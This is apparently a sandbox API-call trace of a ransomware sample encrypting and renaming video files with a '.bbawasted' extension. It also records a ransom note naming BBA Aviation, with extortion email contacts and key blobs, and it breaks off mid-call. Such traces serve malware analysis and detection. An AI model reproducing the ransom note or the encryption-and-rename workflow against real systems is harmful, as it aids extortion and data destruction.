[0229.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\OeTMrntM7irAJ8Qb.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\oetmrntm7iraj8qb.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0229.612] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0229.612] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xa0f5 [0229.612] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa0f5) returned 0x600000 [0229.612] CloseHandle (hObject=0x280) returned 1 [0229.614] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0229.614] CloseHandle (hObject=0x294) returned 1 [0229.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0229.614] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a61b8) returned 1 [0229.615] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0229.615] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0229.615] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6a38) returned 1 [0229.616] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0229.616] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0230.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0230.057] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0230.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0230.057] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LebXvbBSycCPttOprU6YB9RzYpWUp2fdtbFuJ+T0VDiHQhIgzAJU/B/tB3VtW0O9\r\niotFK/pRTgkB7DK58u1Ol7FV0a47XuW/h439pkEjFFK35iG6xQ14TnTznupxi6Iw\r\nia4G3vRODzsu1tBYKYYdX45eP82jJwP/o+Tu4EFQ1sLkTxpciAjTYM6O+VIHpI1w\r\n6YBDZ8bp4xY5Y6fAb+V4goCbEqD+5DgLTd1wSeXfvDiruKi2YKZ4PViPvpayrGhZ\r\nG8L8+o9QMXD0p3TYuOQSRy+8NnofthjMupA3x+EUgZU+96Lrw+0oNNOABRetOaD4\r\n6t2ni2olGbW+yD6DdBqoz5YfZ8H0nrl+UJkEP0Ie4jQTURYeBo0KzGGOaolInbQC\r\nNvPAk62aqMnfUeZGGtQjRl1oa5pzuJGVsivcrPOaC5oxoar63lWwCkKXU4F8AJfU\r\n5MyxKqlFwuN7tn3NqVJOMQ407pPGLDsBduWk2AEuSJouDcKBYW8cBs7ww4NRReXc\r\ndCaE2ZiCv4k3KfvGAPRC3mIyxZZWzSGmvwu+51W6wFhIjsU6GW+qWdZTMWKmNlIR\r\njsepQLAD/1BEvyWlvQej3RVJ6buNe/HVzWT8DavZPWb7VEdER0s9rxlKwNTpMSAd\r\nDg10uE6Aao/FIYd0j6G67+O9DY2dqOHtgGTAN9RJXHl=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.057] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0230.058] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0230.058] SetEndOfFile (hFile=0x28c) returned 1 [0230.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0230.061] CloseHandle (hObject=0x28c) returned 1 [0230.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6beb98 | out: hHeap=0x660000) returned 1 [0230.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b9ef8 | out: hHeap=0x660000) returned 1 [0230.062] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a61b8) returned 1 [0230.062] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0230.062] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0230.062] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\MX5x U.avi") returned 73 [0230.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x29c) returned 0x6c4b88 [0230.063] lstrcpyW (in: lpString1=0x6c4c1a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.063] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6460) returned 1 [0230.063] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0230.063] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0230.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\MX5x U.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\mx5x u.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0230.067] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.069] SetEndOfFile (hFile=0x28c) returned 1 [0230.069] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.069] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.069] lstrcpyW (in: lpString1=0x6c4c1a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\MX5x U.avi" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\mx5x u.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\MX5x U.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\mx5x u.avi.bbawasted")) returned 1 [0230.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\MX5x U.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\mx5x u.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0230.070] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0230.070] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x6b15 [0230.070] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b15) returned 0x5f0000 [0230.070] CloseHandle (hObject=0x27c) returned 1 [0230.072] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.072] CloseHandle (hObject=0x294) returned 1 [0230.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0230.072] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a63d8) returned 1 [0230.073] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0230.073] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0230.073] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0230.074] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0230.074] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0230.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0230.082] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0230.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.082] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Qu7ow9pGyZgHLxfEsee3oPK5rb7HjcLr80cGNQZNw/aFbhkyub0V1D276PCkBedF\r\nQKGX1fhr94LQX8/1vlGCnTDasSxUGBqzU86ui8Nl3OSoxMo78G2CH98JwfmIgoRL\r\n7+NNiVQhGKk6jtbKKNo/LcBuBvly4hkE1Lh2kRDj7q+Kt2q9//bm51wK/B6D0bem\r\njfckyJALPmz4g/LFHqGjzhPrSl7NkGeJ/3YM3O70uJLeTJ01ncSLv/2bBdBwACnG\r\nlJlhqRFKuFjjIMUwDMqy1vyQyre+dBhgCDlNIB9XwaZkPnCevUHUj5/U1rMGG0Tu\r\nZIpx6i9a46lR3nnF1FjNJTrJcNVE5TMA0kDJ8V25YP6gElK7Y4a5L9b6VCSqX4bf\r\nuyvjFu8IPRHkUIYJeqrqoyiiW+0Y/1WAKmyOtIxHzyZ1noF5ypZ1s3aRW6htSqIi\r\nFF9as/9JaePDkqt8l6WJZwf4Wc3RZaQ+v39zQU2frCGbsJsGNzPXYQWkPEABp/qK\r\nBw7E6jt+FWeLeSZWNGLL9vsCEY6e6ga3MidpFWloNWX62IS1PLuAiMUcaZlEeM63\r\nHzQNysvA/l9Nc75TPz+O6MNQfl1QII73zRB+QWQawX+cx3y2dK/f9l1YttCJNFHL\r\nPsqPvdfUu+f3Ecl5qYGzPNOWe1iXyjWsKSXqzRE98i4=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.082] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0230.082] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0230.083] SetEndOfFile (hFile=0x28c) returned 1 [0230.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.088] CloseHandle (hObject=0x28c) returned 1 [0230.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0230.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc7f0 | out: hHeap=0x660000) returned 1 [0230.088] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6570) returned 1 [0230.259] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0230.259] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0230.259] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\rZEAyMVlrlXtfl88t.avi") returned 84 [0230.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b2) returned 0x6aecf0 [0230.260] lstrcpyW (in: lpString1=0x6aed98, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.260] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0230.260] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a61b8) returned 1 [0230.261] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0230.261] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0230.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\rZEAyMVlrlXtfl88t.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\rzeaymvlrlxtfl88t.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0230.262] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.263] SetEndOfFile (hFile=0x28c) returned 1 [0230.263] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0230.263] lstrcpyW (in: lpString1=0x6aed98, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.263] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\rZEAyMVlrlXtfl88t.avi" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\rzeaymvlrlxtfl88t.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\rZEAyMVlrlXtfl88t.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\rzeaymvlrlxtfl88t.avi.bbawasted")) returned 1 [0230.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\rZEAyMVlrlXtfl88t.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\rzeaymvlrlxtfl88t.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0230.264] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0230.264] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x50c4 [0230.265] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x50c4) returned 0x5f0000 [0230.265] CloseHandle (hObject=0x294) returned 1 [0230.266] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.266] CloseHandle (hObject=0x27c) returned 1 [0230.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0230.266] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f10) returned 1 [0230.267] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0230.267] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0230.267] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0230.267] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0230.268] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0230.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0230.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0230.277] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0230.277] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]KnAzuum+fT4gzhUy/TsDTU+g8vQ3b1Fua0E72cNVrY0nZPif4VRTtL1jSxe4MzDI\r\nMpwNmHBBgcXizzuQupmMALOmvjBGVBk1XidfzhQcPTj2Q0Y8bkwXWEj2X8sqYFgo\r\nFyBbUb/HzJykkIKEZVyhX57coOnKb2fchdk+lfdxzP6ySvWnBXYvXO8wvMsH1Ydz\r\nfND/PsO7Es4spHZx2RHvBGzd5wCe2D+9IHA5ypuHCkG8wu+dHKMxUhFGhxG+vrlB\r\nH7FHux/NQw7v4Zuinz4Am+JeAzWbGmkB5YOTb/pFtbutHtn998CP5J/NXNK0TLgt\r\nbx1sR0pSD/PhMDrcv/uzZIWq9eGNs2aCDHQ98cR+i5fb2PE8Mq4nS6pVNx89+agt\r\nevPgJ/OwJvLIxqNHYgXFPmKMshSaQ3OTL7EtheGDXB0SGoTIQoHfvhVBtqq2ANcz\r\nvtKZhdn30youS1amBc4r9aabJlqSxLZQcE2BwzYfPXfmjKOGnHq9b9Khsc1A8t+a\r\nVzOeS6aLb7G/R74W5Tlkdvfublqux9OmI08s0ktuySKPfbeRDVpz2yPUqZ5Golzy\r\ncdfKIBL3Gl/7YgCdQkxunp+yD94YKvh4uDQqp2NHfhxLtTLOL0KZlKjFY9+99O8e\r\ng6xWKX8I7k3UbLY53I5d4aXfbJtL7eyMglOPFrfzrmH=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0230.277] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0230.278] SetEndOfFile (hFile=0x28c) returned 1 [0230.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0230.280] CloseHandle (hObject=0x28c) returned 1 [0230.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0230.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae7f0 | out: hHeap=0x660000) returned 1 [0230.280] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6bd0) returned 1 [0230.281] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0230.281] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0230.281] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\YZI9BXBq.flv") returned 69 [0230.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x294) returned 0x6ae598 [0230.281] lstrcpyW (in: lpString1=0x6ae622, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0230.281] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0230.282] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0230.282] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0230.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\YZI9BXBq.flv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\yzi9bxbq.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0230.283] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.284] SetEndOfFile (hFile=0x28c) returned 1 [0230.284] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0230.284] lstrcpyW (in: lpString1=0x6ae622, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\YZI9BXBq.flv" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\yzi9bxbq.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\YZI9BXBq.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\yzi9bxbq.flv.bbawasted")) returned 1 [0230.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\YZI9BXBq.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\yzi9bxbq.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0230.285] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0230.286] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x16be [0230.286] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16be) returned 0x5f0000 [0230.286] CloseHandle (hObject=0x27c) returned 1 [0230.286] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.287] CloseHandle (hObject=0x294) returned 1 [0230.287] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0230.287] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 